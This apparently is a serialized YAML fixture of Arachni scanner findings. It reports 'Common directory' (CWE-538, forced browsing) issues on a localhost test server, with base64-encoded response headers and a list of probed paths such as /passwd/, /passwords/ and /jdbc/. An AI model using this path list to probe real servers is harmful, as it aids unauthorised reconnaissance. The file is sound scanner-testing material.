MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/tmp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/tmp/
injected: tmp
id: tmp
elem: path
remarks: {}
method: ''
response: tmp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/save/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/save/
injected: save
id: save
elem: path
remarks: {}
method: ''
response: save
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/archive/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/archive/
injected: archive
id: archive
elem: path
remarks: {}
method: ''
response: archive
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/marketing/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/marketing/
injected: marketing
id: marketing
elem: path
remarks: {}
method: ''
response: marketing
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/pass/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/pass/
injected: pass
id: pass
elem: path
remarks: {}
method: ''
response: pass
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/passwd/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/passwd/
injected: passwd
id: passwd
elem: path
remarks: {}
method: ''
response: passwd
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/passwords/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/passwords/
injected: passwords
id: passwords
elem: path
remarks: {}
method: ''
response: passwords
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/password/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/password/
injected: password
id: password
elem: path
remarks: {}
method: ''
response: password
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/jdbc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/jdbc/
injected: jdbc
id: jdbc
elem: path
remarks: {}
method: ''
response: jdbc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/files/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/files/
injected: files
id: files
elem: path
remarks: {}
method: ''
response: files
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/site/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/site/
injected: site
id: site
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: site
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sales/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sales/
injected: sales
id: sales
elem: path
remarks: {}
method: ''
response: sales
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/log/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/log/
injected: log
id: log
elem: path
remarks: {}
method: ''
response: log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/logs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/logs/
injected: logs
id: logs
elem: path
remarks: {}
method: ''
response: logs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/login/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/login/
injected: login
id: login
elem: path
remarks: {}
method: ''
response: login
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
